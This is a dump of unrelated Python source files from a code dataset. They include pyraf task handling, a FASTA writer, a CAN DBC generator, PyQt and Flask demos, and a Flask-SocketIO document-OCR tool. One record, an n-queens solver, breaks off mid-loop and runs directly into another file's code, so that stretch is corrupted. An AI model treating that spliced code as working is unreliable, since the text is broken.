task {self.getName()}: \"\n f\"{filename}\")\n if self.hasParfile():\n if Verbose > 0:\n print(\"Foreign task \" + self.getName() +\n \" cannot have a parameter file\",\n file=sys.stderr)\n self._hasparfile = 0\n\n def setParList(self, *args, **kw):\n \"\"\"Set arguments to task\n\n Does not use IrafParList structure -- just keeps list of\n the arguments\n \"\"\"\n if '_setMode' in kw:\n del kw['_setMode']\n if len(kw) > 0:\n raise ValueError(f'Illegal keyword parameters {list(kw.keys())} '\n f'for task {self._name}')\n # self._args = args\n # Insure that all arguments passed to ForeignTasks are\n # converted to strings, including objects which are not\n # naturally converted to strings.\n # self._args = map(re.escape,map(str,args))\n self._args = list(map(self._str_escape, args))\n\n # =========================================================\n # private methods\n # =========================================================\n def _str_escape(self, arg):\n if not isinstance(arg, str):\n _arg = re.escape(str(arg))\n else:\n _arg = arg\n return _arg\n\n def _applyRedir(self, redirKW):\n \"\"\"Apply I/O redirection\"\"\"\n return iraf.redirApply(redirKW)\n\n def _run(self, redirKW, specialKW):\n \"\"\"Execute task after parameters, I/O redirection are prepared.\"\"\"\n args = self._args\n self._nsub = 0\n # create command line\n cmdline = _re_foreign_par.sub(self._parSub, self._filename)\n if self._nsub == 0 and args:\n # no argument substitution, just append all args\n cmdline = cmdline + ' ' + ' '.join(args)\n if Verbose > 1:\n print(\"Running foreign task: \" + cmdline, file=sys.stderr)\n # create and run the sub-process\n subproc.subshellRedir(cmdline)\n\n def _parSub(self, mo):\n \"\"\"Substitute an argument for this match object\"\"\"\n self._nsub = self._nsub + 1\n n = mo.group('n')\n if n is not None:\n # $n -- simple substitution\n n = int(n)\n if n > len(self._args):\n return ''\n elif n == 0:\n return self._name\n else:\n return self._args[n - 1]\n n = mo.group('paren')\n if n is not None:\n # $(n) -- expand IRAF virtual filenames\n n = int(n)\n if n > len(self._args):\n return ''\n elif n == 0:\n return self._name\n else:\n return iraf.Expand(self._args[n - 1])\n n = mo.group('all')\n if n is not None:\n # $* -- append all arguments\n return ' '.join(self._args)\n n = mo.group('allparen')\n if n is not None:\n # $(*) -- append all arguments with virtual filenames converted\n return ' '.join(map(iraf.Expand, self._args))\n raise IrafError(f\"Cannot handle foreign string `{self._filename}' \"\n f\"for task {self._name}\")\n\n\n# -----------------------------------------------------\n# Utility function to split qualified names into components\n# -----------------------------------------------------\n\n\ndef _splitName(qualifiedName):\n \"\"\"Split qualifiedName into components.\n\n qualifiedName looks like [[package.]task.]paramname[subscript][.field],\n where subscript is an index in brackets. Returns a tuple with\n (package, task, paramname, subscript, field). IRAF one-based subscript\n is changed to Python zero-based subscript.\n \"\"\"\n # name components may have had 'PY' appended if they match Python keywords\n slist = list(map(irafutils.untranslateName, qualifiedName.split('.')))\n\n # add field=None if not present\n\n if len(slist) == 1 or not basicpar.isParField(slist[-1]):\n # no field\n slist.append(None)\n if len(slist) > 4:\n raise IrafError(\"Illegal syntax for parameter: \" + qualifiedName)\n slist = [None] * (4 - len(slist)) + slist\n\n # parse possible subscript and insert into list\n\n paramname = slist[2]\n pstart = paramname.find('[')\n if pstart >= 0:\n try:\n pend = paramname.rindex(']')\n pindex = int(paramname[pstart + 1:pend]) - 1\n slist[2:3] = [paramname[:pstart], pindex]\n except (TypeError, ValueError):\n raise IrafError(\"Illegal syntax for array parameter: \" +\n qualifiedName)\n else:\n slist[3:3] = [None]\n return slist\n\n\n#\n# When a user has a problem, I often wonder where the task they are\n# using came from and how it is defined. This set of tools shows a\n# hierarchy of the task/package definitions that led us here.\n#\n# (I would also like to know what file contained the task definition, but\n# that information is not available)\n#\n# This is used by the task \"taskinfo\" in iraffunctions.py; there is some\n# user documentation there.\n#\n\n\n# find all the task definitions that match a particular wildcard\ndef gettask(name):\n return [x for x in all_task_definitions if fnmatch.fnmatch(x._name, name)]\n\n\n# make a printable line about a single task object - this doesn't say everything,\n# but it may say enough without being too cluttered.\ndef printable_task_def(x):\n cl = str(x.__class__)\n if '.' in cl:\n cl = cl.split('.')[-1]\n\n # I wonder if there is a significance to using getFullpath instead of _filename\n\n s = f\"{x._name} : {x.getFullpath()} - pkgbinary={x._pkgbinary} class={cl}\"\n return s\n\n\n# show a task line, then show the package that task may have come from, then where\n# that came from, and so on. The top level is normally \"clpackage\" which is its\n# own parent.\ndef showtasklong(name, level=0):\n l = gettask(name)\n if len(l) < 1:\n print((\" \" * level) + f'{name} : NOT FOUND')\n else:\n l.sort()\n for x in l:\n print((\" \" * level) + printable_task_def(x))\n next_name = x._pkgname\n if (next_name == name) or (level > 15):\n pass\n else:\n showtasklong(next_name, level=level + 1)\n","repo_name":"iraf-community/pyraf","sub_path":"pyraf/iraftask.py","file_name":"iraftask.py","file_ext":"py","file_size_in_byte":76010,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"47"} +{"seq_id":"73689838542","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals, generators, nested_scopes, with_statement)\nfrom builtins import (bytes, dict, int, list, object, range, str, ascii,\n chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)\nimport re\nimport os\n\n#=========================================================================\n# Attributes:\n# width\n# Methods:\n# FastaWriter()\n# Instance Methods:\n# writer=FastaWriter(optionalWidth)\n# writer.writeFasta(defline,sequence,filename)\n# writer.appendToFasta(defline,sequence,filename)\n# writer.addToFasta(defline,sequence,filehandle)\n#=========================================================================\nclass FastaWriter:\n \"\"\"FastaWriter\"\"\"\n def __init__(self,width=60):\n self.width=width\n\n def writeFasta(self,defline,seq,filename):\n with open(filename,\"w\") as fh:\n self.addToFasta(defline,seq,fh)\n \n def addToFasta(self,defline,seq,fh):\n defline=defline.rstrip()\n if(not re.search(\"^\\s*>\",defline)): defline=\">\"+defline\n fh.write(defline+\"\\n\");\n length=len(seq)\n numLines=length//self.width\n if(length%self.width>0): numLines+=1\n start=0\n for i in range(0,numLines):\n line=seq[start:start+self.width]\n fh.write(line+\"\\n\")\n start+=self.width\n if(length==0): fh.write(\"\\n\")\n\n def appendToFasta(self,defline,seq,filename):\n if(not os.path.exists(filename)):\n self.writeFasta(defline,seq,filename)\n return\n with open(filename,\"a\") as fh:\n self.addToFasta(defline,seq,fh)\n\n\n","repo_name":"bmajoros/python","sub_path":"FastaWriter.py","file_name":"FastaWriter.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9578294914","text":"def place(row,column,n):\n if(row==0):\n return True\n for k in range(row):\n if(l[k][column]==1):\n return False\n h=row\n j=column\n while(h>0 and j>0):\n h=h-1\n j=j-1\n if(l[h][j]):\n return False\n h=row\n j=column\n while(h>0 and j хеш\"\"\"\n return {'hash': bd.add_data(request.headers, request.json)}\n\n\n@app.route('/find', methods=['POST'])\ndef find():\n \"\"\"Поиск по заголовку или body -> данные\"\"\"\n return {'data': bd.get_data(request.json)}\n\n\n@app.route('/find2', methods=['GET'])\ndef find2():\n \"\"\"Получаем все записи по hash -> данные\"\"\"\n try:\n data = bd.get_data_by_hash(request.args.get('h'))\n return {'data': data}\n except ValueError:\n return {'Error': 'Неправильный тип хэша'}\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"Yogel9/incidents_collector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30980284694","text":"from dataclasses import asdict\nfrom packet import Packet\n\n\nclass DBC:\n\n # if provided filepath, load DBC tree structure from path\n def __init__(self, filepath=None, packets=None, ecu_packets=None):\n if packets is not None:\n self.packets = packets\n self.bus_ids = set()\n self.ecu_packets = ecu_packets\n for packet in packets:\n self.bus_ids.add(packet.bus_id)\n return\n\n self.packets = [] # packet list\n self.bus_ids = set()\n if filepath is not None:\n pass\n\n @classmethod\n def from_packets_list(cls, packets_data: list, ecu_packets: str) -> \"DBC\":\n packets = []\n for data in packets_data:\n packet = Packet.from_dict(data)\n packets.append(packet)\n\n return cls(packets=packets, ecu_packets=ecu_packets)\n\n def to_dict(self):\n data = {\"packet\": []}\n\n for packet in self.packets:\n data[\"packet\"].append(asdict(packet))\n\n return {\"file\": [data]}\n\n def add_packet(self, packet):\n \"\"\"\n Add packet to dbc\n \"\"\"\n self.bus_ids.add(packet.bus_id)\n self.packets.add(packet)\n\n def is_valid(self):\n \"\"\"\n Determine if this is a valid dbc\n \"\"\"\n pass # we don't have invalid dbcs. duh\n\n def __repr__(self):\n \"\"\"\n Custom string representation\n \"\"\"\n packet_strs = []\n for packet in self.packets:\n packet_strs.append(str(packet))\n\n return \"\"\"VERSION \"\"\n\n\nNS_ : \n\tNS_DESC_\n\tCM_\n\tBA_DEF_\n\tBA_\n\tVAL_\n\tCAT_DEF_\n\tCAT_\n\tFILTER\n\tBA_DEF_DEF_\n\tEV_DATA_\n\tENVVAR_DATA_\n\tSGTYPE_\n\tSGTYPE_VAL_\n\tBA_DEF_SGTYPE_\n\tBA_SGTYPE_\n\tSIG_TYPE_REF_\n\tVAL_TABLE_\n\tSIG_GROUP_\n\tSIG_VALTYPE_\n\tSIGTYPE_VALTYPE_\n\tBO_TX_BU_\n\tBA_DEF_REL_\n\tBA_REL_\n\tBA_DEF_DEF_REL_\n\tBU_SG_REL_\n\tBU_EV_REL_\n\tBU_BO_REL_\n\tSG_MUL_VAL_\n\nBS_:\n\nBU_: {bus_ids}\n\n{packets}\n\n{ecu_packets}\n\n\nBA_DEF_ BU_ \"TpNodeBaseAddress\" HEX 0 65535;\nBA_DEF_ BO_ \"GenMsgSendType\" STRING ;\nBA_DEF_ \"ProtocolType\" STRING ;\nBA_DEF_ \"NmType\" STRING ;\nBA_DEF_ BO_ \"GenMsgCycleTime\" INT 1 10000;\nBA_DEF_ BO_ \"GenMsgILSupport\" ENUM \"No\",\"Yes\";\nBA_DEF_ BU_ \"ILUsed\" ENUM \"No\",\"Yes\";\nBA_DEF_ \"VersionNumber\" INT 0 10000;\nBA_DEF_ \"VersionDay\" INT 1 31;\nBA_DEF_ \"VersionMonth\" INT 1 12;\nBA_DEF_ \"VersionYear\" INT 2016 3000;\nBA_DEF_ \"BusType\" STRING ;\nBA_DEF_ BO_ \"DBC_Author_Contact\" STRING ;\nBA_DEF_DEF_ \"DBC_Author_Contact\" \"CANbusInfo@AEMelectronics.com\";\nBA_DEF_DEF_ \"TpNodeBaseAddress\" 0;\nBA_DEF_DEF_ \"GenMsgSendType\" \"Cyclic\";\nBA_DEF_DEF_ \"ProtocolType\" \"\";\nBA_DEF_DEF_ \"NmType\" \"\";\nBA_DEF_DEF_ \"GenMsgCycleTime\" 20;\nBA_DEF_DEF_ \"GenMsgILSupport\" \"Yes\";\nBA_DEF_DEF_ \"ILUsed\" \"Yes\";\nBA_DEF_DEF_ \"VersionNumber\" 0;\nBA_DEF_DEF_ \"VersionDay\" 1;\nBA_DEF_DEF_ \"VersionMonth\" 1;\nBA_DEF_DEF_ \"VersionYear\" 2016;\nBA_DEF_DEF_ \"BusType\" \"Can\";\nBA_ \"ProtocolType\" \"AEM Net\";\nBA_ \"NmType\" \"AEM Net\";\nBA_ \"VersionNumber\" 3;\nBA_ \"VersionDay\" 28;\nBA_ \"VersionMonth\" 11;\nBA_ \"BusType\" \"CAN\";\nBA_ \"GenMsgCycleTime\" BO_ 2180030470 50;\nBA_ \"GenMsgCycleTime\" BO_ 2180030466 16;\nBA_ \"GenMsgCycleTime\" BO_ 2180030465 16;\nBA_ \"GenMsgCycleTime\" BO_ 2180030464 16;\n\n\"\"\".format(\n bus_ids=\" \".join(self.bus_ids), packets=\"\\n\\n\".join(packet_strs), ecu_packets=self.ecu_packets\n )\n","repo_name":"WURacing/dbc_generator","sub_path":"dbc_generator/dbc.py","file_name":"dbc.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"9340996565","text":"import sys\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\n\n\nclass Window(QWidget):\n def __init__(self):\n super(Window, self).__init__()\n self.setWindowTitle(\"Styled PushButton\")\n self.setGeometry(50, 50, 500, 300)\n layout = QGridLayout()\n self.setLayout(layout)\n\n default = QPushButton(\"Default\")\n flat = QPushButton(\"Flat\")\n flat.setFlat(True)\n styled = QPushButton(\"Styled\")\n styled.setObjectName(\"styled\")\n\n layout.addWidget(default, 0, 0)\n layout.addWidget(flat, 0, 1)\n layout.addWidget(styled, 1, 0)\n self.stylesheet()\n\n def stylesheet(self):\n \tcss = \"\"\"\n \t\tQPushButton {\n \t\t\tmin-height: 2em;\n \t\t\tfont: bold 18px;\n \t\t}\n \t\tQPushButton#styled {\n \t\t\tbackground-color: #32e1e3;\n \t\t\tcolor: black;\n \t\t\tborder-style: outset;\n \t\t\tborder-width: 1px;\n \t\t\tborder-color: #43e2e4;\n \t\t\tborder-radius: 20px;\n \t\t\tpadding: 6px;\n \t\t}\n \t\tQPushButton#styled:hover {\n \t\t\tbackground-color:#4455e8;\n \t\t\tcolor: white;\n \t\t}\n \t\tQPushButton#styled:pressed {\n \t\t\tbackground-color:#99e5e8;\n \t\t\tcolor: white;\n \t\t}\n \t\"\"\"\n \tself.setStyleSheet(css)\n\n\napp = QApplication(sys.argv)\n\n\ndef main():\n window = Window()\n window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shoukreytom/Python","sub_path":"gui/pyqt/stylesheet/PushButton.py","file_name":"PushButton.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17183040518","text":"from cs50 import get_string\n\npunctuation = ['.', '!', '?']\n\ntext = get_string(\"Text: \").split()\n\nwords = len(text)\nletters = 0\nsentences = 0\n\nfor word in text:\n for char in word:\n if char.isalpha():\n letters += 1\n if word[-1] in punctuation:\n sentences += 1\n\ngrade = int(round(((5.88 * letters - 29.6 * sentences) / words) - 15.8))\nif grade < 1:\n print(\"Before Grade 1\")\nelif grade > 15:\n print(\"Grade 16+\")\nelse:\n print(\"Grade \", grade)\n","repo_name":"Andrew-CC-Martin/cs50-psets","sub_path":"pset6/readability/readability.py","file_name":"readability.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"15896854681","text":"#!/usr/bin/env python\nimport os, os.path\nimport win32com.client\nimport sqlite3\nimport threading\nimport numpy as np\nimport selenium.webdriver.chrome.service as service\nimport time\nimport psutil\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\nimport sys\nimport csv\nimport subprocess\nimport getpass\nimport ctypes\nfrom PIL import Image\nfrom numpy import genfromtxt\nfrom sklearn import datasets, svm, metrics\nfrom subprocess import Popen\nfrom threading import Lock\nfrom flask import Flask, render_template, session, request, redirect, url_for\nfrom flask_socketio import SocketIO, emit, send, join_room, leave_room, close_room, rooms, disconnect\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom threading import Thread\nfrom multiprocessing import Process\n\n\ntemploop = 0\ntempcount = 1\nresultimg = \"\"\nCustomer_ID = \"\"\nSurname = \"\"\nFirst_Name = \"\"\nOther_Names = \"\"\nTitle = \"\"\nsuffix = \"\"\nSalutation = \"\"\nGender = \"\"\nDeceased_Date = \"\"\nDate_of_Birth = \"\"\nCountry_of_birth = \"\"\nPlace_of_Birth = \"\"\nTax_Residence1 = \"\"\nTax_Residence2 = \"\"\nTax_Residence3 = \"\"\nTax_Residence4 = \"\"\nTax_Residence5 = \"\"\nTax_Residence6 = \"\"\nTax_Residence7 = \"\"\nTax_Residence8 = \"\"\nTax_Residence9 = \"\"\nTax_Residence10 = \"\"\nTax_Reference_no_1 = \"\"\nTax_Reference_no_2 = \"\"\nTax_Reference_no_3 = \"\"\nTax_Reference_no_4 = \"\"\nTax_Reference_no_5 = \"\"\nTax_Reference_no_6 = \"\"\nTax_Reference_no_7 = \"\"\nTax_Reference_no_8 = \"\"\nTax_Reference_no_9 = \"\"\nTax_Reference_no_10 = \"\"\npermanet_add_1 = \"\"\npermanet_add_2 = \"\"\npermanet_add_3 = \"\"\npermanet_add_4 = \"\"\npermanet_add_5 = \"\"\nPostCode = \"\"\nCountry_of_Residence = \"\"\nHome_No = \"\"\nBusiness_No = \"\"\nMobile_No = \"\"\nEmail_Add = \"\"\nNanpa_Country_Home = \"\"\nNanpa_Code_Home = \"\"\nNanpa_Country_Bus = \"\"\nNanpa_Code_Bus = \"\"\nNanpa_Country_Mob = \"\"\nNanpa_Code_Mob = \"\"\nTax_Reference_no_1 = \"\"\nTax_Reference_no_2 = \"\"\nTax_Reference_no_3 = \"\"\nTax_Reference_no_4 = \"\"\nTax_Reference_no_5 = \"\"\nTax_Reference_no_6 = \"\"\nTax_Reference_no_7 = \"\"\nTax_Reference_no_8 = \"\"\nTax_Reference_no_9 = \"\"\nTax_Reference_no_10 = \"\"\nthreadflag = 0\ncaseref = \"\"\nglobalfilename = \"\"\nvalstatus = \"0%\"\nvalstatustitle = \"\"\nasync_mode = None\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\n#async_mode = \"eventlet\"\nsocketio = SocketIO(app, async_mode=async_mode)\n#thread = None\n#thread_lock = Lock()\n\napp.debug=True\n\ntempsplit = \"\"\n\n\n@app.route('/')\ndef index():\n return render_template('indextesting.html', async_mode=socketio.async_mode)\n\n\n@socketio.on('my_event', namespace='/test')\ndef test_message(message):\n global tempsplit\n global temploop\n print(\"my-event trigger\")\n tempsplit = message['data']\n runmacro()\n temploop = 1\n \n \n #t1 = threading.Thread(target=runmacro)\n #t1.start()\n #t1.join() \n \n \n #print(\"dasssssss \" + message['data'])\n #session['receive_count'] = session.get('receive_count', 0) + 1\n #emit('my_response_dass',\n # {'data': message['data'], 'count': session['receive_count']})\n #test_message(\"dd\")\n emit('my_bo',\n {'CIN': Customer_ID, 'Name': Salutation, 'Country_of_birth': Country_of_birth, 'Tax_Residence1': Tax_Residence1, 'Tax_Residence2': Tax_Residence2, 'Tax_Residence3': Tax_Residence3, 'Tax_Residence4': Tax_Residence4, 'Tax_Residence5': Tax_Residence5, 'Tax_Residence6': Tax_Residence6, 'Tax_Residence7': Tax_Residence7, 'Tax_Residence8': Tax_Residence8, 'Tax_Residence9': Tax_Residence9})\n print(\"emit bo\")\n emit('img_result',\n {'img_resultss': resultimg})\n print(\"emit img_result\")\n\n\t\n@socketio.on('testmy_event', namespace='/test')\ndef test_message_timmer(message):\n global temploop\n if(temploop == 1):\n emit('my_bo',\n {'CIN': Customer_ID, 'Name': Salutation, 'Country_of_birth': Country_of_birth, 'Tax_Residence1': Tax_Residence1, 'Tax_Residence2': Tax_Residence2, 'Tax_Residence3': Tax_Residence3, 'Tax_Residence4': Tax_Residence4, 'Tax_Residence5': Tax_Residence5, 'Tax_Residence6': Tax_Residence6, 'Tax_Residence7': Tax_Residence7, 'Tax_Residence8': Tax_Residence8, 'Tax_Residence9': Tax_Residence9})\n print(\"emit bo\")\n emit('img_result',\n {'img_resultss': resultimg})\n print(\"emit img_result\")\n temploop = 0\n else:\n pass\n #db = sqlite3.connect('dassdb')\n #cursor = db.cursor()\n #cursor.execute('''CREATE TABLE users(name TEXT, status TEXT)''')\n #cursor.execute('''SELECT name, status FROM users''')\n #user1 = cursor.fetchone() #retrieve the first row\n #print(user1[0]) #Print the first column retrieved(user's name)\n #all_rows = cursor.fetchall()\n #for row in all_rows:\n # row[0] returns the first column in the query (name), row[1] returns email column.\n #print('{0} : {1}, {2}'.format(row[0], row[1], row[2]))\n \n \n #db.commit()\n #db.close()\n \n print(\"Timmer called\" + message)\n \n#@socketio.on('testmessage')\n#def handle_message(testmessage):\n# send(\"Dasstest\")\n\t\n@socketio.on('disconnect', namespace='/test')\ndef test_disconnect():\n print('Client disconnected', request.sid)\n\n\n@socketio.on('my_eventtesting', namespace='/test')\ndef bo_data(message):\n global Customer_ID\n emit('my_bo',\n {'CIN': Customer_ID, 'Name': Salutation})\n \n\n@socketio.on('emitstatus', namespace='/test')\ndef status_data(message):\n global valstatus\n global valstatustitle\n emit('my_status',\n {'status' : valstatus, 'text' : valstatustitle})\n\n#from subprocess import Popen\n#p = Popen(\"batch.bat\", cwd=r\"C:\\Path\\to\\batchfolder\")\n#stdout, stderr = p.communicate()\n\n@socketio.on('extract_button', namespace='/test')\ndef test_extract_button(message):\n \n print(\"extract_button : \")\n get_result_image()\n emit('my_bo',\n {'CIN': Customer_ID, 'Name': Salutation, 'Country_of_birth': Country_of_birth, 'Tax_Residence1': Tax_Residence1, 'Tax_Residence2': Tax_Residence2, 'Tax_Residence3': Tax_Residence3, 'Tax_Residence4': Tax_Residence4, 'Tax_Residence5': Tax_Residence5, 'Tax_Residence6': Tax_Residence6, 'Tax_Residence7': Tax_Residence7, 'Tax_Residence8': Tax_Residence8, 'Tax_Residence9': Tax_Residence9})\n print(\"emit bo\")\n emit('img_result', {'img_resultss': resultimg})\n print(\"emit img_result\")\n\n print(\"extract_button ==> \" + message)\n\n\n\n\n\n \n\n\ndef roteimage(fname):\n image = cv2.imread(fname)\n \n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n gray = cv2.bitwise_not(gray)\n thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n coords = np.column_stack(np.where(thresh>0))\n angle = cv2.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n (h,w)=image.shape[:2]\n center = (w//2,h//2)\n M = cv2.getRotationMatrix2D(center,angle,1.0)\n image2 = cv2.imread(fname)\n rotated = cv2.warpAffine(image2,M,(w,h),flags=cv2.INTER_CUBIC,borderMode=cv2.BORDER_REPLICATE)\n #cv2.putText(rotated,\"Angle: {:.2f} degrees\".format(angle),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255),2)\n print(\"[INFO] angel: {:3f}\".format(angle))\n print(angle)\n #cv2.imshow(\"Rotated\",rotated)\n gray = cv2.cvtColor(rotated,cv2.COLOR_BGR2GRAY)\n gray = cv2.bitwise_not(gray)\n thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n blur3 = cv2.GaussianBlur(thresh,(5,5),0)\n gray3 = cv2.bitwise_not(blur3)\n cv2.imwrite(str(fname).replace(\".png\",\"r.png\"),gray3)\n #cv2.imwrite(str(fname).replace(\".png\",\"r.png\"),rotated)\n #cv2.waitKey(0)\n\ndef templatematchtax(fname,tname):\n img = cv2.imread(fname,0)\n img2 = img.copy()\n template = cv2.imread(tname,0)\n w, h = template.shape[::-1]\n\n img = img2.copy()\n method = 'cv.TM_CCOEFF_NORMED'\n # Apply template Matching\n #cv2.TM_CCORR_NORMED\n \n res = cv2.matchTemplate(img,template,cv2.TM_CCORR_NORMED)\n print(cv2.minMaxLoc(res))\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n # If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n top_left = min_loc\n else:\n top_left = max_loc\n threshold = 0.98\n loc = np.where( res >= threshold)\n for pt in zip(*loc[::-1]):\n print(\"dass\", pt,res)\n cv2.rectangle(img, pt, (pt[0] + w, pt[1] + h), (150,150,0), 3)\n height, width = img.shape\n #new_img3=img[pt[1]:pt[1] + h +20,pt[0]:pt[0] + w+80]\n new_img3=img[pt[1]-20:pt[1] + h +40,1:width]\n temptname = str(tname).replace(\".png\",\"\")\n print(temptname)\n cv2.imwrite(\"static/\" + str(getpass.getuser() + '_' + temptname + '_result_' + fname).replace(\"r.png\",\".png\"),new_img3)\n cv2.imwrite(\"static/\" +str(getpass.getuser() + '_' + temptname + fname).replace(\".png\",\"m.png\"),img)\n\n\ndef removefile():\n for item in os.listdir():\n if item.startswith(getpass.getuser()) and item != 'selvgnb_123456_Input.pdf' and item != 'selvgnb_123457_Input.pdf' and item!= getpass.getuser() + \"_caseref.txt\":\n os.remove(item)\n\n for item2 in os.listdir(\"static/\"):\n file_path = os.path.join(\"static/\", item2)\n if item2.startswith(getpass.getuser()) and item2 != 'selvgnb_123456_Input.pdf' and item2 != 'selvgnb_123457_Input.pdf' and item!= getpass.getuser() + \"_caseref.txt\":\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n #os.remove(item2)\n except:\n print(\"unable to delete \" + item2)\n \n\n\n\ndef createbat(fname):\n global globalfilename\n global caseref\n getpagecount(fname)\n file = open(getpass.getuser() + \"pagecount.txt\", \"r\")\n pagecount = int(file.read())\n f = open(getpass.getuser() + 'GS2.bat','w')\n for x in range(pagecount):\n f.write('\"C:\\Program Files\\gs\\gs9.19\\\\bin\\gswin64c.exe\" -dNOPAUSE -dBATCH -dFirstPage=' + str(x + 1) + ' -dLastPage=' + str(x+1) + ' -sDEVICE=png16m -r200x200 -sOutputFile=\"' + getpass.getuser() + '_' + caseref + '_' + 'DInputPage' + str(x+1) + '.png\" ' + globalfilename + '\\n')\n #f.write('\"C:\\Temp\\Dass\\Software\\gs9.19\\\\bin\\gswin64c.exe\" -dNOPAUSE -dBATCH -dFirstPage=' + str(x + 1) + ' -dLastPage=' + str(x+1) + ' -sDEVICE=png16m -r200x200 -sOutputFile=\"' + getpass.getuser() + '_' + caseref + '_' + 'DInputPage' + str(x+1) + '.png\" ' + globalfilename + '\\n')\n f.close()\n\n\n\ndef removeborder(fname):\n image = cv2.imread(fname)\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n gray = cv2.bitwise_not(gray)\n #column border\n for i in range(int(len(gray[0]))):\n if int(len(gray)/4) < int(np.count_nonzero(gray[:,i])):\n gray[:,i-25:i+50] = 0\n \n #row border\n for i in range(int(len(gray))):\n if int(len(gray[0])/3) < int(np.count_nonzero(gray[:][i])):\n gray[:][i-50:i+100] = 0\n\n\n gray = cv2.bitwise_not(gray)\n #cv2.imshow(\"draw\", gray)\n cv2.imwrite(str(fname),gray)\n\ndef mainprocess():\n global caseref\n global globalfilename\n global valstatus\n global valstatustitle\n filepath = getpass.getuser() + \"_caseref.txt\" \n with open(filepath) as fp:\n line = fp.readline()\n cnt = 1\n while line:\n globalfilename = str(line.strip())\n print(\"Line {}: {}\".format(cnt, globalfilename))\n a,b,c = globalfilename.split(\"_\")\n caseref = b\n print(\"case ref\" + caseref)\n line = fp.readline()\n cnt += 1\n print(\"image spring is running\")\n createbat(globalfilename)\n #createbat('DassInput.pdf')\n\n p = Popen(getpass.getuser() + \"GS2.bat\")\n stdout, stderr = p.communicate()\n print(stdout,stderr)\n for item in os.listdir():\n if (getpass.getuser() in item) and (caseref in item) and ('DInputPage' in item) and item.endswith('r.png') == False:\n removeborder(item)\n roteimage(item)\n\n for item in os.listdir():\n if (getpass.getuser() in item) and (caseref in item) and ('DInputPage' in item) and item.endswith('r.png'):\n templatematchtax(item,'AccountOpeningForm.png')\n templatematchtax(item,'statementfrequency.png')\n\n get_result_image()\n\t\t\n\ndef getpagecount(fname):\n global globalfilename\n if os.path.exists(getpass.getuser() + \"pagecount.txt\"):\n os.remove(getpass.getuser() + \"pagecount.txt\")\n else:\n pass\n #print(\"The file does not exist\")\n \n \n f = open(getpass.getuser() + 'pagecount.bat','w')\n f.write('\"C:\\Program Files\\gs\\gs9.19\\\\bin\\gswin64c.exe\" -q -dNODISPLAY -c \"(' + globalfilename + ') (r) file runpdfbegin pdfpagecount = quit\" > ' + getpass.getuser() + 'pagecount.txt')\n #f.write('\"C:\\Temp\\Dass\\Software\\gs9.19\\\\bin\\gswin64c.exe\" -q -dNODISPLAY -c \"(' + globalfilename+ ') (r) file runpdfbegin pdfpagecount = quit\" > ' + getpass.getuser() + 'pagecount.txt')\n f.close()\n p = Popen(getpass.getuser() + \"pagecount.bat\")\n stdout, stderr = p.communicate()\n \n #print(stdout,stderr)\n #file = open(\"pagecount.txt\", \"r\") \n #print(file.read())\n\ndef get_result_image():\n global resultimg\n resultimg= \"\"\n resultflag = 0\n print(\"Getting result image\")\n for item in os.listdir(\"static/\"):\n if ('_result_' in item) and (getpass.getuser() in item):\n a,b,c,d,e,f = str(item).split(\"_\")\n d1, d2 = f.split(\"Page\")\n d3 = int(d2.replace(\".png\",\"\"))\n resultimg = resultimg + (getpass.getuser() + \" : \" + str(b) + \" : \" + str(d3) + \" : \" + str(e)) + \",\"\n print((getpass.getuser() + \" : \" + str(b) + \" : \" + str(d3) + \" : \" + str(e))) \n resultflag = 1\n if (resultflag == 0):\n resultflag = (getpass.getuser() + \" : \" + str(\"No Match\") + \" : \" + str(\"\") + \" : \" + str(\"\"))\n\n\ndef runmacro():\n global valstatus\n global valstatustitle\n print(\"running macro\")\n #test_message(\"ddd\")\n removefile()\n \n \n global Customer_ID\n global Surname\n global First_Name\n global Other_Names\n global Title\n global suffix\n global Salutation\n global Gender\n global Deceased_Date\n global Date_of_Birth\n global Country_of_birth\n global Place_of_Birth\n global Tax_Residence1\n global Tax_Residence2\n global Tax_Residence3\n global Tax_Residence4\n global Tax_Residence5\n global Tax_Residence6\n global Tax_Residence7\n global Tax_Residence8\n global Tax_Residence9\n global Tax_Residence10\n global Tax_Reference_no_1\n global Tax_Reference_no_2\n global Tax_Reference_no_3\n global Tax_Reference_no_4\n global Tax_Reference_no_5\n global Tax_Reference_no_6\n global Tax_Reference_no_7\n global Tax_Reference_no_8\n global Tax_Reference_no_9\n global Tax_Reference_no_10\n global permanet_add_1\n global permanet_add_2\n global permanet_add_3\n global permanet_add_4\n global 